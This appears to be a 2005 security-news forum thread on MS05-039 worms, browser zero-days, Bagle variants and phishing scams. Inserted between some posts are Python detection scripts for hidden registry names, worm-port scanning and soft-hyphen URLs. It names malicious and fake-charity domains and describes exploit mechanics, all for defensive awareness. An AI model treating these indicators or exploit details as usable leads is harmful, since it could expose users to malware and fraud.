The Internet Storm Center went to yellow alert for a 24 hour period to highlight the need for administrators and others to take precautions and preventative actions. Vulnerable versions might be found in Office versions earlier than Office 2003, or other older Microsoft products.
The MSDDS.DLL version must be higher than 7.0.9064.9112 to be considered safe. To test this, find MSDDS.DLL and check the File PROPERTIES and then check the VERSION information. As I’m using Office XP, I’ve personally tested the ISC Killbit solution and so far so good.
IE Zero Day Exploit – Internet Storm Center returns to Yellow
Microsoft Security Advisory for MSDDS.DLL Issue
-
August 20, 2005 at 12:53 pm #3066261
MS05-039: Virus Writers compete in Botwars to create top variant
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
About a year ago, the authors of Netsky/Bagle/MyDoom virus variants were engaged in a “virus war” where they deleted existing copies of competing viruses when infecting a susceptible PC. Similarly, the virus writers who have created Zotob, Bozori, IRCBot, and other MS05-039 variants have engaged in a competitive effort to be the top worm creating MS05-039 based infections.
F-Secure Weblog: August 17, 2005 “This is not a viruswar, this is a botwar!”
QUOTE: Here is a status update on the malware using the Plug-and-Play vulnerability (MS05-039). For the last four days we got 11 different samples of malware using this vulnerability. Currently there are three Zotob variants (.A, .B and .C), one Rbot (.YK), one Sdbot (.ADB), one CodBot, three IRCbots (.ES, .ET and .EX) and two variants of Bozori (.A, .B).
Variants from both IRCBot and Bozori families are deleting competing PnP bots. It seems there are two groups that are fighting: IRCBot and Bozori vs Zotobs and the other Bots.
See our high-tech illustration for details.
-
August 20, 2005 at 12:53 pm #3066262
MS05-039: Great blog link summarizing Zotob virus developments
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Dominic White’s blog entry provides an excellent summary of MS05-039 developments:
-
August 21, 2005 at 12:54 am #3068330
Internet Explorer – MSDDS Zero Day Exploit additional links
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
F-Secure provides an updated list of links related to the MSDDS exploit.
The Msdds.dll component is not installed by default with Windows, but might come with several other Microsoft applications. A vulnerability on it allows for malicious exploitation upon visiting a website.
The following links provide extended information:
Internet Storm Center
Secunia
FrSIRT
SecurityFocus
SecurityTracker
ISS
US-CERT
Microsoft advisory
-
August 24, 2005 at 8:54 am #3068140
Microsoft HoneyMonkey Project – designed to find malicious websites
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft is initiating a new campaign to search for malicious websites with its new HoneyMonkey project.
QUOTE: Strider HoneyMonkey is a Microsoft Research project to detect and analyze Web sites hosting malicious code. The intent is to help stop attacks that use Web servers to exploit unpatched browser vulnerabilities and install malware on the PCs of unsuspecting users. Such attacks have become one of the most vexing issues confronting Internet security experts. Strider HoneyMonkey is a project of the Cybersecurity and Systems Management group in Microsoft Research.
- Understanding HoneyMonkey
- Full research technical report on Strider HoneyMonkey
- MSR Cybersecurity and Systems Management Group
-
August 24, 2005 at 8:54 am #3068141
Apple Macintosh OS X – Security Update 2005-007
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Apple released its seventh security update for the OS/X operating system last week. This update protects the operating system and supporting products. This update provides protection from buffer overflows, arbitrary code execution, and other security vulnerabilities. Macintosh users should quickly patch their systems to ensure the greatest level of protection.
Apple OS X patches released last week
http://isc.sans.org/diary.php?date=2005-08-18
Apple OS X – Security Update 2005-007
http://docs.info.apple.com/article.html?artnum=302163
-
August 24, 2005 at 12:54 pm #3068069
CyberMules — Crooks lure citizens into international crime
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
That was a fascinating read, as I also learned more about the “dark side of the force”. It’s clear that it’s still too easy to get credit on a fraudulent basis. It also affirms that ads promoting work-at-home opportunities should be carefully reviewed.
-
August 25, 2005 at 12:54 pm #3056134
MS05-039 Worms: XP SP1 with lowered security settings can be vulnerable
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft has issued a new advisory that Windows XP SP1 PCs with lowered security settings are also vulnerable to MS05-039 worm attacks similar to the ones that hit Windows 2000 systems. The Forced Guest account and open file sharing increase security risks anyway and they allow the worm to infect XP systems which were thought to be safe from this W/2000 based attack. Microsoft noted that these particular settings are not often used.
Microsoft Security Advisory (906574) – Clarification of Simple File Sharing and ForceGuest
Microsoft has issued this Security Advisory to clarify information of the issue addressed in Security Bulletin MS05-039 for non-default configurations of Windows XP Service Pack 1. This feature is known as “Simple File Sharing and ForceGuest.”
If you are using Windows XP Service Pack 2, enabling Simple File Sharing and ForceGuest does not increase your level of exposure to the MS05-039 security vulnerability. Also, customers that have applied the security update included with MS05-039 are not impacted by this issue.
We recommend that customers continue to follow our Protect Your PC guidance of enabling a firewall, getting software updates and installing anti-virus software. Customers can learn more about these steps by visiting the Protect Your PC Web site.
-
August 25, 2005 at 2:15 pm #3056076
MS05-039 Bozori worm – Rise of the business worm?
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The MS05-039 based Bozori worm impacted a number of major businesses yet it didn’t impact Internet users as extensively as the Blaster and Sasser worms did in 2003 and 2004 respectively. This most likely is due to the vulnerability being in W/2000 and the random IP generation design which might make it spread faster on the inside of the network. Kaspersky in this article discusses the potential for virus writers to target vulnerable businesses who may have difficulty keeping up each month with security patches.
MS05-039 Bozori worm – Rise of the business worm?
QUOTES: There’s no question that this worm is spreading. However, it seems to be confined to localized ‘explosions’ inside large corporations. These organizations, typically made up of ‘small internets’ behind heavily defended Internet gateways, have experienced infection.
The Bozori incident suggests that we’re on the threshold of a new era, in which ‘business worms’ will cause ‘local network outbreaks’ in large corporations, but will have little effect on the Internet as a whole.
-
August 25, 2005 at 2:15 pm #3056075
Unixwiz.net Tech Tip: An Illustrated Guide to IPSec
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
This is an awesome resource for understanding the technical architecture of the IPSec environment from a very talented Microsoft MVP.
Unixwiz.net Tech Tip: An Illustrated Guide to IPSec
QUOTE: IPSec is a suite of protocols for securing network connections, but the details and many variations quickly become overwhelming. This is particularly the case when trying to interoperate between disparate systems, causing more than one engineer to just mindlessly turn the knobs when attempting to bring up a new connection.
-
August 26, 2005 at 2:15 pm #3053775
MSRC: Inside Microsoft’s Zotob Situation Room
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
A neat “behind the scenes” of what MSRC was doing during the MS05-039 worm attacks:
MSRC: Inside Microsoft’s Zotob Situation Room
QUOTE: In the wee hours of Sunday morning, an enterprise customer contacted the MSRC with the first positive identification of what would become the Zotob attack. Toulouse declined to name the customer.
“They came to us with a sample of a new attack that they believed was exploiting the Plug and Play vulnerability,” he said. “We took the code and started our own investigation. We also passed it to our VIA [Virus Information Alliance] partners to make sure everyone can get their signatures updated to provide protection.”
The MSRC’s investigation confirmed that an actual attack exploiting MS05-039 was under way and would only get worse.
“Early Sunday morning, our investigators tell us to get started on our process. We weren’t seeing a widespread attack, and the anti-virus vendors weren’t seeing anything major yet. But, with everything we knew, we decided to activate our security response process.”
By 10 a.m. Sunday, pagers started buzzing. The Situation Room was set up in Building 27 at Microsoft’s Redmond campus.
….
-
August 26, 2005 at 2:15 pm #3053776
Two Arrests have been made related to Zotob worm
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
-
August 26, 2005 at 2:15 pm #3053777
Windows Registry – Nasty Games of Hide & Seek
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
For the past 2 days, the Internet Storm Center (ISC) shared a warning on long registry key values that can be made hidden from REGEDIT by malware making removal more complicated than in the past.
The ISC is offering a free Registry Search Tool. This neat new tool will locate the registry key values greater than 255 characters in length.
Windows Registry – Nasty Games of Hide & Seek
http://isc.sans.org/diary.php?date=2005-08-24
http://isc.sans.org/diary.php?date=2005-08-25
ISC Registry Search tool — locates long key values
http://isc.sans.org/LVNSearch.exe
QUOTE: We have started to see some possible reports of malware which utilizes this concealment technique in the wild. Products that have been reported to be able to query/report/delete/etc these keys:
AppSense Environment Manager
HiJackThis v1.99.1 (SCAN function)
HiJackThis v1.99.2 (in development)
Stillsecure SafeAccess
Sysinternals Autoruns (mixed reports)
Regedt32 (Win2k)
-
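As an added example for the Windows Registry post above (my code, not the ISC tool and not anything posted there), here is a Python script that performs the same check offline against a REGEDIT export (.reg file): it walks the export and reports every key or value name longer than 255 characters, the length the post gives as the point where REGEDIT stops showing them. Exporting a hive with REGEDIT and scanning the file this way lets an analyst find such entries from a clean machine. The sample export embedded below is constructed for the example; the key path in it is the standard Run key, but the entries are invented.

```python
import re

# Threshold from the post: the ISC tool reports names longer than 255
# characters, which the REGEDIT of the day does not display.
MAX_NAME_LEN = 255

# "[HKEY_...\Path]" lines open a key; a leading '-' inside the brackets marks a
# deletion in .reg syntax and is captured separately so it is not counted.
KEY_LINE = re.compile(r"^\[(-?)([^\]]+)\]$")
# '"value name"=...' lines; the name may contain escaped quotes/backslashes.
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=')


def _unescape(name):
    # .reg files escape backslash and double quote inside quoted names
    return re.sub(r"\\(.)", r"\1", name)


def find_long_names(reg_text, max_len=MAX_NAME_LEN):
    """Scan a .reg export and return key/value names longer than max_len."""
    findings = []
    current_key = None
    for lineno, line in enumerate(reg_text.splitlines(), start=1):
        key = KEY_LINE.match(line)
        if key:
            current_key = key.group(2)
            leaf = current_key.rsplit("\\", 1)[-1]      # last path component
            if len(leaf) > max_len:
                findings.append({"line": lineno, "kind": "key", "key": current_key,
                                 "name": leaf, "length": len(leaf)})
            continue
        value = VALUE_LINE.match(line)
        if value and current_key is not None:
            name = _unescape(value.group(1))
            if len(name) > max_len:
                findings.append({"line": lineno, "kind": "value", "key": current_key,
                                 "name": name, "length": len(name)})
    return findings


# Constructed sample export (not a real capture): one ordinary Run entry and one
# whose value name is 300 characters long (13 + 287).
LONG_NAME = "UpdateService" + "A" * 287
SAMPLE_REG = "\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]",
    r'"LegitUpdater"="C:\\Program Files\\Vendor\\update.exe"',
    f'"{LONG_NAME}"="C:\\\\WINDOWS\\\\system32\\\\hidden.exe"',
    "",
])


def main():
    for f in find_long_names(SAMPLE_REG):
        print(f"line {f['line']}: {f['kind']} name of {f['length']} chars under {f['key']}")
        print(f"    starts with: {f['name'][:40]}...")


if __name__ == "__main__":
    main()
```

To use it on a real system, export the hive of interest with REGEDIT (File, Export), save as a text file, and pass its contents to `find_long_names`; remember that .reg exports are UTF-16, so open them with that encoding.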
August 27, 2005 at 10:15 pm #3053628
Article: Potential for Destructive PC Microcode or BIOS Virus
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
The attached article discusses the potential for microcode based viruses that could potentially flash the BIOS and make the PC completely unusable. This type of attack occurred on a limited basis in 1998 with the CIH virus and here’s hoping this type of highly destructive attack won’t be forthcoming.
Article: Potential for Destructive PC Microcode or BIOS Virus
Awaiting the PC Killers
AUGUST 22, 2005 (COMPUTERWORLD) – The malicious code enters your network undetected, rapidly infecting more than 100 machines. But this is no ordinary virus. Your antivirus and disk recovery tools can’t help, because the disk drives won’t spin up at all. The drives are toast. The PCs are completely inoperable. The era of microcode attacks has begun.
Could viruses really attack the low-level microcode that makes disk drives run? It’s entirely possible, disk technology experts say. Dimitri Postrigan knows how such a virus might be created — but he’s not telling. Postrigan reverse-engineers and programs hard disk drives at ActionFront Data Recovery Labs.
He says each disk drive has its own internal operating system that enables the device to start up. The operating system microcode resides in a special system area of the disk. “A virus could be written which would destroy the whole system area on a drive. This will make the drive and data almost unrecoverable,” Postrigan says.
-
August 28, 2005 at 6:15 am #3054886
F-Secure reports 1st Medium-scale phone virus infection
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Viruses are new to mobile phone technology and there are some circulating in-the-wild. To date most infections have been with single individuals becoming infected. F-Secure briefly documents how a company’s address book is most likely used to spread this to dozens of individuals in a company. At least 20 true infections resulted that required cleaning and removal of the mobile phone virus.
F-Secure reports 1st Medium-scale phone virus infection
Commwarrior incident – F-Secure Weblog
August 27, 2005 — We’ve now seen the first medium-scale internal infection of a company that was caused by a mobile virus. On Wednesday this week, we were working on a case where a single company had a serious run-in with the Commwarrior.B virus. Several dozens of employees of the company received Bluetooth or MMS transmission of the virus during the day-long outbreak and over twenty of them actually opened the message on their phones and got infected with it.
-
August 31, 2005 at 2:15 pm #3055465
Phishing Attacks – More extensive than usual today
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Since 2000, I’ve been using Yahoo’s free email facilities, as they offer integrated Norton Anti-virus and excellent SPAM protection controls to complement my use of corporate McAfee VS 8.0i. I receive a number of virus infected emails, phishing attacks, and spam daily.
Today, I received a large number of repetitive phishing messages that appear to be from PayPal, requesting that I update and verify my account information, even though I don’t have an account established. It’s always important to pay attention to email messages as they can appear legitimate and you can enter information that may be used for identity theft or fraud.
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
update@paypal.com – Update and Verify Your PayPal account*** Wed 08/31 8k
-
September 1, 2005 at 6:15 am #3055303
ISC Warning: Please give carefully to Hurricane Katrina relief funds
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Please donate carefully through trusted sources such as the Red Cross, church organizations, or other reputable agencies. There are a number of fake emails and websites that have surfaced which capture your credit card information and transfer funds, but to criminals and not the intended victims. Additionally, information shared in these untrusted websites could be used for identity theft purposes.
ISC Warning: Please give carefully to Hurricane Katrina relief funds
Google: Katrina Phishing Scam Warnings
QUOTE: We decided to start a new diary today, regarding the fake domains for donations to the Katrina Hurricanes victims. We updated yesterday’s diary with the information of fake emails and domains being used to get donations for the Katrina Hurricane and Brian Krebs just updated the Security Fix blog, with new information about these fake domains. Some that we strongly suspect so far are katrinahelp.com , katrinarelief.com and katrinacleanup.com.
Please donate to only trusted sites where you have assurances your contributions will go toward helping victims of this major tragedy. Below is a link to the American Red Cross.
-
September 2, 2005 at 10:15 am #3055065
Katrina Malware – Trojan-Downloader.JS.Small.bq is at this website
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Be careful with website links in email messages. It’s a best practice to never click on a URL even to opt out of spam unless you are sure it can be trusted. This breaking news story from an email message spammed to numerous individuals contains a hostile link that will download malware from the website to PCs that visit it.
Katrina Malware – Trojan-Downloader.JS.Small.bq is at this website
F-Secure – September 1st Weblog identifies this new downloader trojan horse
Subject: Re: Katrina killed as many as 80 people.
Just before daybreak Tuesday, Katrina, now a tropical storm, was 35 miles northeast of Tupelo, Miss., moving north-northeast with winds of 50 mph. Forecasters at the National Hurricane Center said the amount of rainfall has been adjusted downward Monday. Mississippi Gov. Haley Barbour said Tuesday that Hurricane Katrina killed as many as 80 people in his state and burst levees in Louisiana flooded New Orleans. Read More
The Read More.. links to “nextermest . com” [DO NOT VISIT THIS SITE as Trojan-Downloader.JS.Small.bq is at this website]. It uses obfuscated javascript to download what looks like a .hta exploit.
-
September 2, 2005 at 10:15 am #3055064
Dameware Remote Control – Buffer Overflow & POC warnings from FrSIRT
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Corporate Users of the Dameware remote control facility should patch their systems expediently as a new vulnerability and proof-of-concept code were published at the end of August.
Dameware Remote Control – Buffer Overflow Exploit Warning
Dameware Remote Control – Proof of Concept Exploit (be careful as actual code for the exploit is published here)
Solution: Upgrade to DameWare Mini Remote Control version 4.9.2.4
QUOTE: A vulnerability was identified in DameWare Mini Remote Control Server, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a buffer overflow error in the authentication procedure that does not properly handle an overly long “username” parameter (port 6129), which could be exploited by unauthenticated remote attackers to compromise a vulnerable system.
By default (DameWare Remote Control Server) DWRCS listens on port 6129 TCP. An attacker can construct a specially crafted packet and exploit this vulnerability. The vulnerability is caused by insecure calls to the lstrcpyA function when checking the username.
-
September 3, 2005 at 10:15 am #3054222
ISC email Hoax warning: Gas shortage hoax
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
http://isc.sans.org/diary.php?date=2005-09-02
There is a hoax e-mail making the rounds about a gas shortage. Don’t run out and create a shortage. And now, we have reports from one of our readers (thanx, Rikki) who is seeing e-mails about a gas shortage floating around. The facts are, yes, there have been gas stations that have run out of gasoline. That is mostly because people have flocked to them to fill up fearing a shortage (can you say self-fulfilling prophecy?). Yes, some refining capacity in the US has been impacted by the hurricane, but we won’t know the impact of that for some time yet. In the meantime, there is gasoline available in the US, and stations are still getting deliveries. Yes, the prices have gone up and conserving would be a good idea, but there is no evidence of an imminent widespread shortage outside of the areas that suffered direct infrastructure damage earlier this week. Remain calm.
-
September 3, 2005 at 6:15 pm #3054182
Windows XP SP2 – Windows Firewall update available
by harry waldron, cpcu, ccp · about 18 years, 7 months ago
In reply to Harry Waldron
Microsoft has released a new update. This update applies to Microsoft Windows XP Service Pack 2 (SP2) or Microsoft Windows Server 2003 Service Pack 1 (SP1). This patch fixes a condition where an exception may not show up in the Windows Firewall GUI, if this exception is created by modifying the registry directly. In order to do this, administrative privileges are required on the box. The danger in this flaw is that a hacker could open a backdoor that would not be shown in the GUI Firewall ruleset.
-
September 6, 2005 at 6:15 pm #3064796
MS05-039: Spybot.WOE exploits 4 unpatched MS vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
A new variant of Spybot has emerged which exploits four unpatched Microsoft vulnerabilities which must be patched on all PCs to ensure the best levels of protection.
W32.Spybot.WOE is a worm with back door capabilities that can be used to launch a distributed denial of service attack. The worm spreads by exploiting numerous vulnerabilities, including the Microsoft Windows Plug and Play Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS05-039).
Firewall protection: The following are TCP ports that should be protected in the firewall for the PC or server: 139, 445, 1427, 4654, 65528, 65529.
Microsoft Security Exploits: Spreads by scanning TCP ports 139 and 445, and exploiting the following vulnerabilities:
- The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS05-039).
- The Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (as described in Microsoft Security Bulletin MS03-026).
- The Microsoft Windows Local Security Authority Service Remote Buffer Overflow(as described in Microsoft Security Bulletin MS04-011).
- The Microsoft Windows ASN.1 Library Bit String Processing Variant Heap Corruption Vulnerability (as described in Microsoft Security Bulletin MS04-007).
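As an added example (my code, not from the post or from Symantec), here is a Python script that applies the port list above as detection logic over a Windows Firewall log (the pfirewall.log file that XP SP2 writes when logging is enabled). It parses the file using its own `#Fields:` header, then flags any source that repeatedly hits the 139/445 scanning ports and any source that touches one of the other listed ports at all. The log lines are constructed for the example and follow the field layout of that header; the addresses are private-range placeholders.

```python
from collections import defaultdict

# Ports from the post. The post says the worm scans 139 and 445 to find
# targets; the remaining four are listed only as ports to protect, so the
# script treats any inbound attempt on them as worth a look.
SCAN_PORTS = {139, 445}
OTHER_WORM_PORTS = {1427, 4654, 65528, 65529}


def parse_pfirewall(log_text):
    """Yield one dict per record of a Windows Firewall log, keyed by the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column names follow the tag
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):          # skip truncated/garbled records
            continue
        yield dict(zip(fields, parts))


def flag_spybot_traffic(log_text, min_scan_hits=2):
    """Return {src-ip: [reasons]} for sources whose inbound TCP traffic matches the worm's ports."""
    scan_hits = defaultdict(int)
    other_hits = defaultdict(set)
    for rec in parse_pfirewall(log_text):
        # Only inbound TCP matters here; "path" is RECEIVE for inbound records.
        if rec["protocol"] != "TCP" or rec["path"] != "RECEIVE":
            continue
        if not rec["dst-port"].isdigit():
            continue
        dport = int(rec["dst-port"])
        if dport in SCAN_PORTS:
            scan_hits[rec["src-ip"]] += 1
        elif dport in OTHER_WORM_PORTS:
            other_hits[rec["src-ip"]].add(dport)

    findings = defaultdict(list)
    for src, n in scan_hits.items():
        if n >= min_scan_hits:
            findings[src].append(f"{n} inbound attempts on 139/445 (worm scanning pattern)")
    for src, ports in other_hits.items():
        findings[src].append(f"inbound attempt on worm-listed port(s) {sorted(ports)}")
    return dict(findings)


# Constructed sample log (not a real capture), in the XP SP2 pfirewall.log layout.
SAMPLE_LOG = """#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

2005-09-06 18:15:01 DROP TCP 10.0.0.77 10.0.0.10 3412 445 48 S 1290456 0 65535 - - - RECEIVE
2005-09-06 18:15:01 DROP TCP 10.0.0.77 10.0.0.11 3413 445 48 S 1290457 0 65535 - - - RECEIVE
2005-09-06 18:15:02 DROP TCP 10.0.0.77 10.0.0.12 3414 139 48 S 1290458 0 65535 - - - RECEIVE
2005-09-06 18:15:05 DROP TCP 10.0.0.23 10.0.0.10 1099 4654 48 S 8812 0 16384 - - - RECEIVE
2005-09-06 18:15:09 OPEN TCP 10.0.0.10 10.0.0.5 1034 80 - - - - - - - - SEND
2005-09-06 18:15:12 DROP TCP 10.0.0.40 10.0.0.10 2201 445 48 S 4455 0 65535 - - - RECEIVE
"""

if __name__ == "__main__":
    for src, reasons in flag_spybot_traffic(SAMPLE_LOG).items():
        print(src)
        for r in reasons:
            print("   ", r)
```

A single hit on 445 (10.0.0.40 in the sample) is normal file-sharing noise and stays below the threshold; raise `min_scan_hits` on busy networks and feed the script the concatenated logs from several hosts to see scanners that touch each machine only once.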
-
September 7, 2005 at 2:15 pm #3064437
Kaspersky Labs: Watch for $9.95 charges on your credit cards
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Kaspersky Labs documents a freshly launched fraud attack where the scammers use low monetary values in an attempt to go unnoticed.
Are you $9.95 out of pocket? – September 7, 2005 weblog entry
http://www.viruslist.com/en/weblog?calendar=2005-09
QUOTE: Next to the more or less daily scams mentioned in the previous post, we’re seeing a resurgence in another scamming tactic. Over the last couple of weeks more people are reporting charges of $9.95 to their credit cards – for no reason whatsoever. About a year ago we saw a similar trend and now it has been picked up again.
The scammers hope that because the amount of money is so small, the charge will go unnoticed. They’re also using names which closely resemble real company names to make the charges look (at first glance) more legitimate. So be sure to check your accounts for odd charges on a regular basis.
-
September 8, 2005 at 6:14 pm #3063989
Sept 13, 2005 – Microsoft Security Bulletins Preview
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Here’s hoping the bad guys can’t reengineer the critical bulletin that’s forthcoming in September as we need a break after MS05-039 in August
Title: September 2005 Microsoft Security Response Center Bulletin Notification
Issued: September 8, 2005
On 13 September 2005 Microsoft is planning to release:
Security Updates – One Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for this is critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
Microsoft Windows Malicious Software Removal Tool – Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center.
Non-security High Priority updates on MU, WU, WSUS and SUS – Microsoft will release one NON-SECURITY High-Priority Updates for Windows on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS).
Although we do not anticipate any changes, the number of bulletins, products affected, restart information and severities are subject to change until released.
-
September 9, 2005 at 10:15 am #3063783
Mozilla Firefox – Critical Security Warning for all versions
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Users should avoid links in unsolicited email messages and untrusted URLs regardless of which browser they use. Based on past experience, the Mozilla foundation has a priority on security, so I’m certain this will be addressed soon with a new release of Firefox.
Firefox/Deerpark all versions – Critical Security Warning
http://news.zdnet.com/2100-3513_22-5856201.html
http://techrepublic.com.com/2100-1009_11-5856201.html
http://secunia.com/advisories/16764/
http://security-protocols.com/advisory/sp-x17-advisory.txt
Tom Ferris has discovered a vulnerability in Firefox, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially to compromise a user’s system. The vulnerability is caused due to an error in the handling of an URL that contains the 0xAD character in its domain name. This can be exploited to cause a heap-based buffer overflow.
Successful exploitation crashes Firefox and may potentially allow code execution but requires that the user is tricked into visiting a malicious web site or open a specially crafted HTML file. The vulnerability has been confirmed in version 1.0.6, and is reported to affect versions prior to 1.0.6, and version 1.5 Beta 1.
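As an added example (my code, not Mozilla's and not part of the advisory), here is a Python check that a mail gateway or link-scanning tool could run before a user follows a URL. It finds the 0xAD soft hyphen named above, and any other invisible Unicode format character, in the hostname; shows what IDNA processing would turn the hostname into (RFC 3454 nameprep maps the soft hyphen to nothing, so the character is invisible on the wire as well as on screen); and by default applies the same policy as the temporary Mozilla workaround, refusing every non-ASCII hostname. The URLs used are constructed samples.

```python
import unicodedata
from urllib.parse import urlsplit

SOFT_HYPHEN = "\u00ad"   # the 0xAD character named in the advisory


def invisible_chars(host):
    """(position, description) for each character of host that renders as nothing.

    Unicode category Cf (format characters) covers the soft hyphen as well as
    zero-width joiners and similar characters.
    """
    return [(i, f"U+{ord(c):04X} {unicodedata.name(c, 'UNNAMED')}")
            for i, c in enumerate(host)
            if c == SOFT_HYPHEN or unicodedata.category(c) == "Cf"]


def idna_wire_form(host):
    """Hostname after IDNA ToASCII (nameprep + punycode), or None if IDNA rejects it."""
    try:
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return None


def check_url(url, allow_idn=False):
    """Decide whether a URL's hostname may be followed under the chosen policy.

    allow_idn=False mirrors the Mozilla workaround (IDN switched off entirely);
    allow_idn=True still rejects hostnames carrying invisible characters.
    """
    host = urlsplit(url).hostname or ""
    hits = invisible_chars(host)
    wire = idna_wire_form(host)
    if hits:
        reason = "hidden format character(s) in hostname: " + ", ".join(n for _, n in hits)
    elif not host.isascii() and not allow_idn:
        reason = "non-ASCII hostname and IDN is disabled"
    elif wire is None:
        reason = "hostname rejected by IDNA processing"
    else:
        reason = ""
    return {"host": host, "wire_form": wire, "invisible": hits,
            "allow": reason == "", "reason": reason}


if __name__ == "__main__":
    # Constructed samples: a soft hyphen hidden in "example", a plain ASCII
    # host, and an ordinary internationalised name.
    for u in ("http://ex\u00adample.com/login", "https://example.com/", "http://bücher.example/"):
        r = check_url(u)
        print(f"{r['host']!r:32} -> wire {r['wire_form']!r:26} allow={r['allow']} {r['reason']}")
```

The first sample is the instructive one: the browser shows "example.com", the IDNA step sends "example.com", yet the raw URL string that reaches the vulnerable parser still carries the 0xAD byte, which is why a check has to look at the original characters rather than at the rendered or resolved name.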
-
September 10, 2005 at 8:37 pm #3065689
Mozilla Firefox – IDN Patch corrects critical vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
One day after public disclosure of the vulnerability, an XPI patch was provided that deactivates IDN processing. This tested out well for me
Mozilla Firefox – IDN Patch corrects critical vulnerabilities
https://addons.mozilla.org/messages/307259.html
On September 9, the Mozilla team released a configuration change which, as a temporary measure to work around this problem, disables IDN in the browser. IDN functionality will be restored in a future product update. The fix is either a manual configuration change or a small download which will make this configuration change for the user.
-
September 12, 2005 at 4:38 pm #3065518
Bagle.CZ – New variant using CPL extensions
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
This new variant was massively spammed via email and while the downloader component doesn’t appear to be working, this new variant can deactivate existing AV or FW software installed on the PC. The CPL extensions are typically found inside of a zipped archive. This modified variant bypasses detectability in most AV products and users should be cautious in handling email messages.
McAfee information on this massively spammed variant
http://vil.nai.com/vil/content/v_129588.htm
Trend information
http://secunia.com/virus_information/21411/trojbagle.cz/
Sophos information
http://www.sophos.com/virusinfo/analyses/trojdropperbc.html
ISC information
http://isc.sans.org/diary.php?storyid=665
Multiple new variants of this threat were recently mass spammed. Filenames include 1.cpl and price.cpl and may arrive in a ZIP file named newprice.zip , price_09.zip, price some number.zip , etc. The variants seen thus far are non functional, and deemed a low risk. The first such variant drops a corrupt file (ceeweewe.exe) to the %windir%. The corrupt file is detected as W32/Bagle.dam. Detection will be enhanced in the 4580 DAT release to detect and delete these newly discovered damaged variants. This is a generic detection covering many variants of the W32/Bagle@MM virus when sent in “CPL” format.
-
September 16, 2005 at 1:08 pm #3056533
MS05-039: W32.Iberio new PnP Internet worm
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
W32.Iberio is a worm with back door capabilities that spreads by exploiting the Microsoft Windows Plug and Play Buffer Overflow Vulnerability — as described in Microsoft Security Bulletin MS05-039
-
September 19, 2005 at 1:08 pm #3059224
Bagle.CI/CJ — Multiple New Bagle Variants
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
This new variant seems to closely resemble other variants, and it is packaged in a way that requires new signature files by most AV vendors
Bagle.CI – McAfee Information (DAT 4584 required)
http://vil.nai.com/vil/content/v_135995.htm
Bagle.CJ – McAfee Information (DAT 4585 required)
http://vil.nai.com/vil/content/v_135996.htm
Bagle.BI — New Bagle Variant (Medium Risk by F-Secure)
http://secunia.com/virus_information/21638/bagle.bi/
http://secunia.com/virus_information/21640/trojbagle.da/
